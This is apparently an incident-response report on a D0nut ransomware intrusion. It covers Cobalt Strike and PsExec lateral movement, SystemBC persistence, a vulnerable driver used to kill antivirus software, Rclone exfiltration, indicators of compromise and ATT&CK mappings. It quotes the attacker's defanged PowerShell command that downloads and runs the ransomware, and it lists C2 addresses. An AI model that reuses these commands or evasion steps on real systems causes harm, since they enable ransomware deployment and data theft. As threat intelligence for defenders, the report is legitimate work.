Ransomware was deployed to both user workstations and servers on the compromised domain. An ESXi server was also impacted, resulting in the hosted virtual machines suffering encryption that was performed at the hypervisor level.  

The total time from initial access to encryption is believed to be less than a week.  


Lateral Movement 

The following methods were utilised to move laterally throughout the victim network: 

  • Cobalt Strike remotely installed temporary services on targeted hosts which executed Beacon, triggering a call back to the command and control (C2) server and providing the operator access to the system. An example command line of what the services were configured to run is provided below:

A service was installed in the system.  

Service Name: <random alphanumeric characters> 

Service File Name: \\<target host>\ADMIN$\<random alphanumeric characters>.exe  

Service Type: user mode service  

Service Start Type: demand start  

Service Account: LocalSystem 

  • RDP sessions were established using compromised domain accounts.  
  • PsExec was also used to facilitate remote command execution across hosts. 


The threat actor used SystemBC to establish persistence within the environment. The malware was set to execute whenever a user logs in to the system, which was achieved by modifying the registry key Software\Microsoft\Windows\CurrentVersion\Run within the DEFAULT registry hive (please note this is not referring to the hive located at C:\Users\DEFAULT\NTUSER.dat, but the hive located at C:\Windows\System32\config\DEFAULT). An entry was created under the run key which ran the following command, resulting in execution of SystemBC: 

powershell.exe -windowstyle hidden -Command ” ‘C:\programdata\explorer.exe'” 

Defense Evasion

As part of their efforts to evade interference from security software, the threat actor made use of two files, d.dll and def.exe, which were responsible for dropping the vulnerable driver RTCore64.sys, which has reportedly been exploited by other ransomware groups to disable AV and EDR solutions. The files were dropped in the following folders: 

  • C:\temp\ 
  • C:\ProgramData\ 

Analysis of def.exe identified that the program escalated privileges via process injection, allowing it to terminate any system-level processes not present in its internally stored whitelist.   

The threat actor took additional measures by appending registry configurations to a pre-existing GPO that would disable detection and prevention functionality of Windows Defender. Exclusions for all files with a .exe or .dll extension were also set, along with exclusions for files within the C:\ProgramData\ and C:\directories. The below configuration was applied across all hosts present on the compromised domain:  

Figure 1 Parsed Registry.pol showing malicious configuration added by the threat actor

Command and Control

Cobalt Strike Beacons were heavily utilised to maintain a presence within the network and to extend access via lateral movement.  

SystemBC was also deployed sparingly and appeared to be purely for establishing persistence within the network. SystemBC is a commodity malware backdoor which leverages SOCKS proxying for covert channelling of C2 communications to the operator. Serving as a proxy, SystemBC becomes a conduit for other malware deployed by threat actors to tunnel C2 traffic. Additionally, certain variants facilitate downloading and execution of further payloads, such as shellcode or PowerShell scripts issued by the threat actor.  

Analysis of the executable identified the following IP addresses which are contacted on port 4001 to establish communications with the C2 server: 

  • 85.239.52[.]7  
  • 194.87.111[.]29  


Rclone, an open-source file cloud storage program heavily favoured by threat actors to perform data exfiltration, was deployed once the threat actor had identified a system which hosted data of interest. Through recovering the Rclone configuration file located at C:\User\<user>\AppData\Roaming\rclone.conf, the SFTP server 83.149.93[.]150 was identified as the destination of the exfiltrated data.  

Initially deployed as rclone.exe, the threat actor swiftly renamed the file to explorer.exe in an attempt to blend in. However, due to the file residing in the File Server Resource Manager (FSRM) folder C:\StorageReports\Scheduled\, this artefact was highly noticeable.  


Ransomware was deployed to workstations and servers once the threat actor had exfiltrated data from the network to use as leverage in the forthcoming ransom demands. The ransomware also impacted an ESXi server, encrypting the hosted virtual machines at the hypervisor level.  

Volume shadow copies for a data drive of a file server were purged by the threat actor preceding the ransomware execution.   

The ransomware was downloaded and executed via the following PowerShell command: 

powershell.exe iwr -useb hxxp[:]//ix[.]io/4uD0 -outfile xd.exe ; .\xd.exe debug defgui 

In some other instances, the ransomware was deployed as wxd7.exe. The ransomware executables were observed being executed from the following locations (however it is likely that the folders may vary from case to case and the threat actor uses any folders in the root of C:\): 

  • C:\Temp\ 
  • C:\ProgramData\ 
  • C:\storage\ 
  • C:\StorageReports\

During analysis of the ransomware executable, the following help message was derived which provides command line arguments for the program: 

Figure 2 Help message contained within the ransomware executable

A fairly unique ransom note is dropped after the encryption process in the form of a HTML file named readme.html: 

Figure 3 Ransomware readme note


  1. Ensure that both online and offline backups are taken and test the backup plan regularly to identify any weak points that could be exploited by an adversary.  
  1. Hypervisors should be isolated by placing them in a separate domain or by adding them to a workgroup to ensure that any compromise in the domain in which the hosted virtual machines reside does not pose any risk to the Hypervisors.  
  1. Restrict internal RDP and SMB traffic so that only hosts that are required to communicate via these protocols are allowed to.     
  1. Monitor firewalls for anomalous spikes in data leaving the network. 
  1. Apply Internet restrictions to servers so that they can only establish external communications with known good IP addresses and domains that are required for business operations. 

If you have been impacted by D0nut, or currently have an incident and would like support, please contact our Cyber Incident Response Team on +44 331 630 0690 or email [email protected]

Indicators Of Compromise  

IOC Value Indicator Type Description  
hxxp[:]//ix[.]io/4uD0 URL Hosted ransomware executable – xd.exe 
85.239.52[.]7:4001 IP:PORT SystemBC C2 
194.87.111[.]29:4001 IP:PORT SystemBC C2 
83.149.93[.]150 IP Address SFTP server used for data exfiltration 
eb876e23dbbfe44c7406fcc7f557ee772894cc0b SHA1 Ransomware executable – wxd7.exe 
d4832169535e5d91b91093075f3b10b96973a250 SHA1 SystemBC executable – explorer.exe 
550cd82011df93cc89dc0431fa13150707d6aca2 SHA1 Used to kill AV and EDR processes – def.exe 
f6f11ad2cd2b0cf95ed42324876bee1d83e01775 SHA1 Used to kill AV and EDR processes – RTCore.sys 
C:\ProgramData\xd.exe C:\temp\xd.exe C:\storage\xd.exe C:\Temp\wxd7.exe C:\ProgramData\wxd7.exe C:\storage\wxd7.exe C:\StorageReports\wxd7.exe File Path Ransomware executable 
C:\ProgramData\explorer.exe File Path SystemBC 
C:\StorageReports\Scheduled\explorer.exe  File Path Rclone 
C:\ProgramData\def.exe C:\temp\def.exe C:\ProgramData\d.dll C:\temp\d.dll File Path Used to kill AV and EDR processes 


Tactic Technique ID Description  
Execution  Command and Scripting Interpreter: PowerShell T1059.001 PowerShell was utilized to execute malicious commands  
Execution  System Services: Service Execution T1569.002 Cobalt Strike remotely created temporary services to execute its payload 
Execution  System Services: Service Execution T1569.002 PsExec creates a service to perform it’s execution 
Persistence Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 SystemBC created a run key entry to establish persistence.    
Privilege Escalation  Process Injection: Portable Executable Injection T1055.002 def.exe achieved privilege escalation through process injection 
Defense Evasion  Impair Defenses: Disable or Modify Tools T1562.001 The threat actor modified a legitimate GPO to disable Windows Defender functionality 
Defense Evasion Impair Defenses: Disable or Modify Tools T1562.001 def.exe and d.dll were deployed to terminate EDR and AV services 
Lateral Movement SMB/Admin Windows Shares T1021.002 Cobalt Strike targeted SMB shares for lateral movement 
Lateral Movement SMB/Admin Windows Shares T1021.002 PsExec uses SMB shares to execute processes on remote hosts 
Lateral Movement Remote Services: Remote Desktop Protocol T1021.001 RDP was used to establish sessions to other hosts on the network  
Command and Control Proxy: External Proxy T1090.002 SystemBC communicates with its C2 server via proxies 
Exfiltration  Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol T1048.002 The threat actor exfiltrated data to an SFTP server 
Impact  Inhibit System Recovery T1490 Volume shadow copies for a file server were deleted prior to encryption from the ransomware 
Impact Data Encrypted for Impact T1486 Ransomware was deployed to the estate and impacted both servers and user workstations 
Impact Data Encrypted for Impact T1486 Virtual machines hosted on an ESXi server were encrypted at the hypervisor level 